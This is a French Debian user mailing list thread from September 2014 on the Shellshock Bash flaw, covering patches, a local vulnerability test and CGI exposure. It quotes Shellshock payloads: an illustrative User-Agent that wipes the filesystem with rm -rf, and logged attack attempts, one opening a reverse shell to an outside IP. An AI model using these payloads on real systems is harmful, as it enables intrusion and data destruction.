Re: Linux et Unix affectés par une faille critique dans Bash
Le 25/09/2014 22:24, andre_deb...@numericable.fr a écrit : La vulnérabilité pourrait constituer une plus grande menace que Heartbleed www.developpez.com/actu/75661/Linux-et-Unix-affectes-par-une-faille-critique-dans-Bash-la-vulnerabilite-pourrait-constituer-une-plus-grande-menace-que-Heartbleed/ http://seclists.org/oss-sec/2014/q3/649 Info, hoax ou intox ? André Bonjour, Non ce n'est pas un hoax ! Sur wheezy, la mise à jour a été publiée (bash a été mis à jour lors de l'update/upgrade) Par contre, pas de mise à jour pour squeeze (oui je sais elle est obsolète) Pour vérifier si l'on est vulnérable, exécuter cette commande : env x='() { :;}; echo vulnerable' bash -c 'echo hello' Sur une machine vulnérable, on aura : vulnerable hello Sinon bash: avertissement :x: ignoring function definition attempt bash: erreur lors de l'import de la définition de fonction pour « x » hello Alain -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/5424fff6.50...@jupin.net
Re: Linux et Unix affectés par une faille critique dans Bash
Le Fri, Sep 26, 2014 at 07:56:06AM +0200, JUPIN Alain a écrit : Non ce n'est pas un hoax ! Sur wheezy, la mise à jour a été publiée (bash a été mis à jour lors de l'update/upgrade) Par contre, pas de mise à jour pour squeeze (oui je sais elle est obsolète) Bonne nouvelle: bash (4.1-3+deb6u2) squeeze-lts; urgency=high * Non-maintainer upload by the Security Team. * Add variables-affix.patch patch. Apply patch from Florian Weimer to add prefix and suffix for environment variable names which contain shell functions. * Add parser-oob.patch patch. Fixes two out-of-bound array accesses in the bash parser. * Add CVE-2014-7169.diff diff. CVE-2014-7169: Incomplete fix for CVE-2014-6271. (Closes: #762760, #762761) -- Thijs Kinkhorst th...@debian.org Fri, 26 Sep 2014 00:10:13 +0200 https://wiki.debian.org/LTS/Using Disponible dans tous les bons miroirs. Amicalement, -- Charles Plessy Tsurumi, Kanagawa, Japon -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926061102.ga13...@falafel.plessy.net
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 08:11, Charles Plessy a écrit : Le Fri, Sep 26, 2014 at 07:56:06AM +0200, JUPIN Alain a écrit : Non ce n'est pas un hoax ! Sur wheezy, la mise à jour a été publiée (bash a été mis à jour lors de l'update/upgrade) Par contre, pas de mise à jour pour squeeze (oui je sais elle est obsolète) Bonne nouvelle: bash (4.1-3+deb6u2) squeeze-lts; urgency=high [...] Mauvaise nouvelle pour ceux qui ont fait la mise à jour hier ou cette nuit. La faille n'a pas été entièrement résolue, une nouvelle mise à jour est disponible. -- Daniel -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/54251db7.5050...@tootai.net
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 10:03, Daniel Huhardeaux a écrit : Le 26/09/2014 08:11, Charles Plessy a écrit : Le Fri, Sep 26, 2014 at 07:56:06AM +0200, JUPIN Alain a écrit : Non ce n'est pas un hoax ! Sur wheezy, la mise à jour a été publiée (bash a été mis à jour lors de l'update/upgrade) Par contre, pas de mise à jour pour squeeze (oui je sais elle est obsolète) Bonne nouvelle: bash (4.1-3+deb6u2) squeeze-lts; urgency=high [...] Mauvaise nouvelle pour ceux qui ont fait la mise à jour hier ou cette nuit. La faille n'a pas été entièrement résolue, une nouvelle mise à jour est disponible. Sur un serveur web, est-ce que le fait d'avoir le lien /bin/sh vers dash empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ? -- == | FRÉDÉRIC MASSOT | | http://www.juliana-multimedia.com | | mailto:frede...@juliana-multimedia.com | | +33.(0)2.97.54.77.94 +33.(0)6.67.19.95.69 | ===Debian=GNU/Linux=== -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/54252be0.8060...@juliana-multimedia.com
Re: Linux et Unix affectés par une faille critique dans Bash
Bonjour, Le 25/09/2014 22:24, andre_deb...@numericable.fr a écrit : La vulnérabilité pourrait constituer une plus grande menace que Heartbleed www.developpez.com/actu/75661/Linux-et-Unix-affectes-par-une-faille-critique-dans-Bash-la-vulnerabilite-pourrait-constituer-une-plus-grande-menace-que-Heartbleed/ http://seclists.org/oss-sec/2014/q3/649 Info, hoax ou intox ? Perso, même si c'est vraiment une grosse faille, ça me semble moins grave que Heartbleed. Je vais peut-être dire des bêtises (auquel cas je serais ravi d'avoir des explications) mais il me semble que si l'on prend l'exemple d'un serveur Web, ça n'est pas simple de pouvoir exploiter cette faible à distance. Parce qu'il faut déjà que le serveur web soit amené à lancer un bash ce qui me semble pas toujours le cas (mais il paraît que ça peut arriver avec du cgi par exemple) mais surtout il faut que l'attaquant arrive à distance à faire en sorte qu'une nouvelle variable d'environnement soit définie au moment où le bash s'exécute sur le serveur et ça, ça me semble pas évident à distance. En effet, la faille s'exploite en définissant une variable d'environnement qui fera partie du processus du bash. Mais si un attaquant arrive à faire cela, alors sans même que cette faille existe, ça veut dire qu'il peut modifier le PATH par exemple et potentiellement déjà mettre un peu la pagaille, non ? Je serais curieux d'avoir vos avis d'expert. ;) -- François Lafont -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/54252d9d.5090...@free.fr
Re: Linux et Unix affectés par une faille critique dans Bash
On Friday 26 September 2014 07:56:06 JUPIN Alain wrote: env x='() { :;}; echo vulnerable' bash -c 'echo hello' J'ai upgradé bash et relancé, tapé la commande ci-dessus et j'ai ce message de warning : bash: warning: x: ignoring function definition attempt bash: erreur lors de l'import de la définition de fonction pour « x » hello Quid ? André -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/201409261116.29103.andre_deb...@numericable.fr
Re: Linux et Unix affectés par une faille critique dans Bash
Bonjour, tout le monde. Ce message d'erreur signifie, à mon sens, que Bash a détecté ta tentative de création de fonction par une variable d'environnement et l'a rejetée. Ça prouve que le correctif est appliqué chez toi. Cordialement. Le vendredi 26 septembre 2014 à 11:16 +0200, andre_deb...@numericable.fr a écrit : On Friday 26 September 2014 07:56:06 JUPIN Alain wrote: env x='() { :;}; echo vulnerable' bash -c 'echo hello' J'ai upgradé bash et relancé, tapé la commande ci-dessus et j'ai ce message de warning : bash: warning: x: ignoring function definition attempt bash: erreur lors de l'import de la définition de fonction pour « x » hello Quid ? André -- David Guyot Administrateur système, réseau et télécom / Sysadmin Europe Camions Interactive / Stockway Moulin Collot F-88500 Ambacourt 03 29 30 47 85 signature.asc Description: This is a digitally signed message part
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 11:16, andre_deb...@numericable.fr a écrit : On Friday 26 September 2014 07:56:06 JUPIN Alain wrote: env x='() { :;}; echo vulnerable' bash -c 'echo hello' J'ai upgradé bash et relancé, tapé la commande ci-dessus et j'ai ce message de warning : bash: warning: x: ignoring function definition attempt bash: erreur lors de l'import de la définition de fonction pour « x » hello il faut refaire l'upgrade une fois. il y a une nouvelle upgrade de bash ce matin, il devrait afficher que hello sans erreur. Quid ? André -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/5425303a.4010...@freeatome.com
Re: Linux et Unix affectés par une faille critique dans Bash
Bonjour, Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit : Sur un serveur web, est-ce que le fait d'avoir le lien /bin/sh vers dash empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ? Si tous les CGI utilisent « /bin/sh », alors pas de problème. En revanche, ceux qui utiliseraient explicitement « /bin/bash » seraient impactés. La meilleure parade reste de toute façon la mise-à-jour de Bash… Seb -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926094405.ga16...@sebian.nob900.homeip.net
Re: Linux et Unix affectés par une faille critique dans Bash
bonjour, Le 26 sept. 2014 11:25, admini adm...@freeatome.com a écrit : Le 26/09/2014 11:16, andre_deb...@numericable.fr a écrit : On Friday 26 September 2014 07:56:06 JUPIN Alain wrote: env x='() { :;}; echo vulnerable' bash -c 'echo hello' J'ai upgradé bash et relancé, tapé la commande ci-dessus et j'ai ce message de warning : bash: warning: x: ignoring function definition attempt bash: erreur lors de l'import de la définition de fonction pour « x » hello il faut refaire l'upgrade une fois. il y a une nouvelle upgrade de bash ce matin, il devrait afficher que hello sans erreur. Quid ? André -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/5425303a.4010...@freeatome.com
Re: Linux et Unix affectés par une faille critique dans Bash
bonjour, la nouvelle mise à jour bash 4.2+dfsg-0.1+deb7u3 a vue le jour hier soir vers 23h30 Le 26 sept. 2014 11:25, admini adm...@freeatome.com a écrit : Le 26/09/2014 11:16, andre_deb...@numericable.fr a écrit : On Friday 26 September 2014 07:56:06 JUPIN Alain wrote: env x='() { :;}; echo vulnerable' bash -c 'echo hello' J'ai upgradé bash et relancé, tapé la commande ci-dessus et j'ai ce message de warning : bash: warning: x: ignoring function definition attempt bash: erreur lors de l'import de la définition de fonction pour « x » hello il faut refaire l'upgrade une fois. il y a une nouvelle upgrade de bash ce matin, il devrait afficher que hello sans erreur. Quid ? André -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/5425303a.4010...@freeatome.com
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 11:44, Sébastien NOBILI a écrit : Bonjour, Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit : Sur un serveur web, est-ce que le fait d'avoir le lien /bin/sh vers dash empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ? Si tous les CGI utilisent « /bin/sh », alors pas de problème. En revanche, ceux qui utiliseraient explicitement « /bin/bash » seraient impactés. La meilleure parade reste de toute façon la mise-à-jour de Bash… D'après ce que je comprends, le problème toucherait toutes applications visibles sur Internet et qui utiliserait Bash avec les fonctions du type system(), popen(), etc, et donc quelque soit le langage utilisé, PHP, Python... -- == | FRÉDÉRIC MASSOT | | http://www.juliana-multimedia.com | | mailto:frede...@juliana-multimedia.com | | +33.(0)2.97.54.77.94 +33.(0)6.67.19.95.69 | ===Debian=GNU/Linux=== -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/54253d2e.3020...@juliana-multimedia.com
Re: Linux et Unix affectés par une faille critique dans Bash
On Fri, Sep 26, 2014 at 11:10:53AM +0200, Francois Lafont wrote: Perso, même si c'est vraiment une grosse faille, ça me semble moins grave que Heartbleed. Ça se discute, les effets n'étant pas le même... Par exemple, ici il va falloir mettre à jour les serveurs: c'est lourd, mais on sait faire. Par conter, ne pas mettre à jour, c'est laisser son serveur ouvert à 4 vents. Avec Heartbleed, il fallait demander aux utilisateurs de changer leurs mots de passe, recréer des certificats etc... beaucoup plus d'impact opérationel au final. mais il me semble que si l'on prend l'exemple d'un serveur Web, ça n'est pas simple de pouvoir exploiter cette faible à distance. Parce qu'il faut déjà que le serveur web soit amené à lancer un bash ce qui me semble pas toujours le cas (mais il paraît que ça peut arriver avec du cgi par exemple) mais surtout il faut que l'attaquant arrive à distance à faire en sorte qu'une nouvelle variable d'environnement soit définie au moment où le bash s'exécute sur le serveur et ça, ça me semble pas évident à distance. La définition de CGI, c'est que le serveur Web communique au script les paramètres de la communication (URL, query, IP source, ce genre de choses) par l'intermédiaire de variables d'environnements (REQUEST_URI, si ma mémoire est bonne). Donc tout script CGI a des variables d'environnements qui sont au final définies par le client. Donc tout script CGI bash est exploitable trivialement. En effet, la faille s'exploite en définissant une variable d'environnement qui fera partie du processus du bash. Mais si un attaquant arrive à faire cela, alors sans même que cette faille existe, ça veut dire qu'il peut modifier le PATH par exemple et potentiellement déjà mettre un peu la pagaille, non ? Il ne pourra pas modifier PATH, mais il lui suffit de pouvoir agir sur certaines, et c'est bien le cas. Y. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926093349.gb14...@naryves.com
RE: Linux et Unix affectés par une faille critique dans Bash
Le fix du CVE-2014-6272 n'est pas complet. Faut attendre le fix complet... -- ovd valentin@live.fr De : Frédéric MASSOTmailto:frede...@juliana-multimedia.com Envoyé : 26/09/2014 12:17 À : debian-user-french@lists.debian.orgmailto:debian-user-french@lists.debian.org Objet : Re: Linux et Unix affectés par une faille critique dans Bash Le 26/09/2014 11:44, Sébastien NOBILI a écrit : Bonjour, Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit : Sur un serveur web, est-ce que le fait d'avoir le lien /bin/sh vers dash empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ? Si tous les CGI utilisent « /bin/sh », alors pas de problème. En revanche, ceux qui utiliseraient explicitement « /bin/bash » seraient impactés. La meilleure parade reste de toute façon la mise-à-jour de Bash… D'après ce que je comprends, le problème toucherait toutes applications visibles sur Internet et qui utiliserait Bash avec les fonctions du type system(), popen(), etc, et donc quelque soit le langage utilisé, PHP, Python... -- == | FRÉDÉRIC MASSOT | | http://www.juliana-multimedia.com | | mailto:frede...@juliana-multimedia.com | | +33.(0)2.97.54.77.94 +33.(0)6.67.19.95.69 | ===Debian=GNU/Linux=== -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/54253d2e.3020...@juliana-multimedia.com
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 12:26, valentin OVD a écrit : Le fix du CVE-2014-6272 n'est pas complet. Faut attendre le fix complet... C'est le CVE-2014-6271 Le second est sorti depuis plus de 12h, c'est le CVE-2014-7169 -- ovd valentin@live.fr De : Frédéric MASSOT mailto:frede...@juliana-multimedia.com Envoyé : 26/09/2014 12:17 À : debian-user-french@lists.debian.org mailto:debian-user-french@lists.debian.org Objet : Re: Linux et Unix affectés par une faille critique dans Bash Le 26/09/2014 11:44, Sébastien NOBILI a écrit : Bonjour, Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit : Sur un serveur web, est-ce que le fait d'avoir le lien /bin/sh vers dash empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ? Si tous les CGI utilisent « /bin/sh », alors pas de problème. En revanche, ceux qui utiliseraient explicitement « /bin/bash » seraient impactés. La meilleure parade reste de toute façon la mise-à-jour de Bash… D'après ce que je comprends, le problème toucherait toutes applications visibles sur Internet et qui utiliserait Bash avec les fonctions du type system(), popen(), etc, et donc quelque soit le langage utilisé, PHP, Python... -- == | FRÉDÉRIC MASSOT | | http://www.juliana-multimedia.com | | mailto:frede...@juliana-multimedia.com | | +33.(0)2.97.54.77.94 +33.(0)6.67.19.95.69 | ===Debian=GNU/Linux=== -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/54253d2e.3020...@juliana-multimedia.com -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/542543b9.5090...@tootai.net
Re: Linux et Unix affectés par une faille critique dans Bash
On 2014-09-26 11:10:53 +0200, Francois Lafont wrote: Perso, même si c'est vraiment une grosse faille, ça me semble moins grave que Heartbleed. Je suis d'accord. Je vais peut-être dire des bêtises (auquel cas je serais ravi d'avoir des explications) mais il me semble que si l'on prend l'exemple d'un serveur Web, ça n'est pas simple de pouvoir exploiter cette faible à distance. Parce qu'il faut déjà que le serveur web soit amené à lancer un bash ce qui me semble pas toujours le cas (mais il paraît que ça peut arriver avec du cgi par exemple) mais surtout il faut que l'attaquant arrive à distance à faire en sorte qu'une nouvelle variable d'environnement soit définie au moment où le bash s'exécute sur le serveur et ça, ça me semble pas évident à distance. Il suffit d'un script CGI qui stocke par exemple les valeurs des paramètres dans une variable d'environnement donnée, et qu'un shell bash soit exécuté par le script CGI ou un descendant. Mais sachant que l'environnement est hérité par tous les descendants, utiliser des variables d'environnement pour des paramètres locaux à un script CGI est une façon sale de programmer. En effet, la faille s'exploite en définissant une variable d'environnement qui fera partie du processus du bash. Mais si un attaquant arrive à faire cela, alors sans même que cette faille existe, ça veut dire qu'il peut modifier le PATH par exemple et potentiellement déjà mettre un peu la pagaille, non ? Normalement non, car le processus qui va définir la variable d'environnement va typiquement choisir un nom fixé, par exemple PROCNAME_PARAMETERS. À noter que les variables d'environnement contenant des lettres minuscules n'ont pas de signification particulière et sont réservées aux applications. Cela signifie que les utiliser avec n'importe quelle valeur ne devrait pas poser de problème. Mais bash est toujours vulnérable sur ce point, car on peut redéfinir ainsi des commandes standard (echo, eval, exec, set, etc.), dont au moins une se trouve très probablement dans le script shell. C'est cependant encore moins évident à exploiter (l'ensemble des applications affectées se réduit encore). Il y avait aussi l'exemple d'un serveur DHCP malicieux qui était donné, mais dans un tel cas, il y a probablement d'autres problèmes de sécurité (cf les sites qui distribuent des programmes en http non sécurisé[*], sans même parler de https avec des certificats dont la révocation n'est pas vérifiée...). [*] Dans ce cas, l'utilisateur doit pouvoir vérifier la signature (si celle-ci est fournie) de manière fiable, ce qui n'est pas évident. -- Vincent Lefèvre vinc...@vinc17.net - Web: https://www.vinc17.net/ 100% accessible validated (X)HTML - Blog: https://www.vinc17.net/blog/ Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926104035.ga8...@xvii.vinc17.org
Re: Linux et Unix affectés par une faille critique dans Bash
On 2014-09-26 11:44:05 +0200, Sébastien NOBILI wrote: Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit : Sur un serveur web, est-ce que le fait d'avoir le lien /bin/sh vers dash empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ? Si tous les CGI utilisent « /bin/sh », alors pas de problème. En revanche, ceux qui utiliseraient explicitement « /bin/bash » seraient impactés. Ou ceux qui exécutent un programme menant indirectement à l'exécution de bash, puisque l'environnement est hérité. grep /bin/bash /bin/* /usr/bin/* peut donner une idée de ce qui ne doit pas être exécuté (directement ou indirectement). -- Vincent Lefèvre vinc...@vinc17.net - Web: https://www.vinc17.net/ 100% accessible validated (X)HTML - Blog: https://www.vinc17.net/blog/ Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926104531.gb8...@xvii.vinc17.org
Re: Linux et Unix affectés par une faille critique dans Bash
On 2014-09-26 11:33:50 +0200, Yves Rutschle wrote: On Fri, Sep 26, 2014 at 11:10:53AM +0200, Francois Lafont wrote: Perso, même si c'est vraiment une grosse faille, ça me semble moins grave que Heartbleed. Ça se discute, les effets n'étant pas le même... Par exemple, ici il va falloir mettre à jour les serveurs: c'est lourd, mais on sait faire. Par conter, ne pas mettre à jour, c'est laisser son serveur ouvert à 4 vents. C'était pareil avec Heartbleed: les serveurs avec OpenSSL devaient être mis à jour. Avec Heartbleed, il fallait demander aux utilisateurs de changer leurs mots de passe, recréer des certificats etc... beaucoup plus d'impact opérationel au final. Oui, et en plus, comme la majorité des navigateurs ne vérifie pas la révocation des certificats (au moins par défaut), cela peut encore faire des dégâts. La définition de CGI, c'est que le serveur Web communique au script les paramètres de la communication (URL, query, IP source, ce genre de choses) par l'intermédiaire de variables d'environnements (REQUEST_URI, si ma mémoire est bonne). Ceci dit, il faut que les deux premiers caractères de la valeur soient (). Pas possible pour certaines variables. Peut-être query? Donc tout script CGI a des variables d'environnements qui sont au final définies par le client. Donc tout script CGI bash est exploitable trivialement. Mais de tels scripts ne doivent pas être très courants. Si le serveur web exécute le script via system() et que /bin/sh est bash, c'est aussi exploitable. -- Vincent Lefèvre vinc...@vinc17.net - Web: https://www.vinc17.net/ 100% accessible validated (X)HTML - Blog: https://www.vinc17.net/blog/ Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926105536.gc8...@xvii.vinc17.org
Re: Linux et Unix affectés par une faille critique dans Bash
Le vendredi 26 septembre 2014 à 12:45, Vincent Lefevre a écrit : Ou ceux qui exécutent un programme menant indirectement à l'exécution de bash, puisque l'environnement est hérité. grep /bin/bash /bin/* /usr/bin/* peut donner une idée de ce qui ne doit pas être exécuté (directement ou indirectement). Ouah, j'étais jamais allé vérifier les sheebangs dans ces dossiers, je ne pensais pas trouver autant de scripts maqués avec Bash ! C'est dommage car la plupart d'entre eux pourraient sûrement être rendus compatibles avec le standard à moindre frais… Seb -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/20140926124251.gb16...@sebian.nob900.homeip.net
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26 sept. 14 à 11:44, Sébastien NOBILI a écrit : Bonjour, Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit : Sur un serveur web, est-ce que le fait d'avoir le lien /bin/sh vers dash empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ? Si tous les CGI utilisent « /bin/sh », alors pas de problème. En revanche, ceux qui utiliseraient explicitement « /bin/bash » seraient impactés. La meilleure parade reste de toute façon la mise-à-jour de Bash… Bien sûr. Ceci dit, et si la faille existe depuis 22 ans comme c'était écrit dans l'article, elle n'a sans doute pas été connue par énormément de pirates potentiels… Ce n'est certainement pas la peine de flipper. Seb -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/ 20140926094405.ga16...@sebian.nob900.homeip.net -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/b5967a47-c6ac-49c2-a873-ec6f7938a...@worldonline.fr
Re: Linux et Unix affectés par une faille critique dans Bash
Merci pour vos réponses. Effectivement je me trompais. Si j'ai bien compris, le problème n'est pas le fait qu'un attaquant (via le web, je me plaçais dans cette hypothèse) puisse *créer* une variable d'environnement particulière qu'un processus local bash utilisera ensuite. Le problème n'est pas vraiment là car ceci normalement est difficilement réalisable. Le problème c'est qu'un attaquant puisse s'arranger pour *définir* de manière malicieuse une variable d'environnement *déjà* utilisée de base par un processus local bash, ce qui serait davantage faisable. Par exemple, on peut supposer qu'un script bash en cgi récupère le user agent en tant que variable d'environnement, alors dans ce cas le méchant pirate paramètre son navigateur pour que le user agent soit : () { true;}; rm -rf --no-preserve-root / Par exemple. ;) -- François Lafont -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/m03p6p$m4q$1...@ger.gmane.org
Re: Linux et Unix affectés par une faille critique dans Bash
Le 26/09/2014 15:12, Philippe Gras a écrit : Le 26 sept. 14 à 11:44, Sébastien NOBILI a écrit : Bonjour, Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit : Sur un serveur web, est-ce que le fait d'avoir le lien /bin/sh vers dash empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ? Si tous les CGI utilisent « /bin/sh », alors pas de problème. En revanche, ceux qui utiliseraient explicitement « /bin/bash » seraient impactés. La meilleure parade reste de toute façon la mise-à-jour de Bash… Bien sûr. Ceci dit, et si la faille existe depuis 22 ans comme c'était écrit dans l'article, elle n'a sans doute pas été connue par énormément de pirates potentiels… Ce n'est certainement pas la peine de flipper. Ah ? Si tu gères des serveurs web je te propose de faire un simple cat fichier log serveur web|grep () { et de compter le nombre de tentatives d'accès comme par exemple 89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 404 345 - () { :;}; /bin/ping -c 1 198.101.206.138 ou encore 202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] GET / HTTP/1.0 200 961 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.101/ 01' [...] -- Daniel -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: https://lists.debian.org/54257a48.8030...@tootai.net
Re: Linux et Unix affectés par une faille critique dans Bash
Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a écrit : Ah ? Si tu gères des serveurs web je te propose de faire un simple cat fichier log serveur web|grep () { et de compter le nombre de tentatives d'accès comme par exemple 89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 404 345 - () { :;}; /bin/ping -c 1 198.101.206.138 ou encore 202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] GET / HTTP/1.0 200 961 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.101/ 01' D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le second exemple de logs sur un de mes serveurs, ce qui correspond à une tentative d'implantation de porte dérobée — https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/ Cordialement. -- David Guyot Administrateur système, réseau et télécom / Sysadmin Europe Camions Interactive / Stockway Moulin Collot F-88500 Ambacourt 03 29 30 47 85 signature.asc Description: This is a digitally signed message part
Re: Linux et Unix affectés par une faille critique dans Bash
